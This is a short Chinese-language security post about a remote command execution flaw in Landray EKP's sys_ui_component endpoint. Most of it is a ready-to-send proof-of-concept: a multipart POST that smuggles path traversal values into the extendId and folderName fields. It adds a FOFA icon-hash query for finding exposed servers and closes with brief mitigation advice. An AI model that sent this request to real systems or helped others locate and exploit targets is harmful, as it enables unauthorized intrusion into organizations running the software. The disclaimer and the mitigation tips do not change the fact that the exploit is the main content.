請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。工具來自網絡,安全性自測,如有侵權請聯系刪除。
藍凌 EKP sys_ui_component 遠程命令執行漏洞,攻擊者可通過此漏洞上傳惡意腳本文件,對服務器的正常運行造成安全威脅。POC如下所示:
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host:xx.xx.xx.xx
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
fofa:icon_hash="831854882"
頁面是這個樣子的:

使用poc:


1、請聯系廠商進行修復。
2、如非必要,禁止公網訪問該系統。
3、設置白名單訪問。
該文章在 2024/8/24 12:22:52 編輯過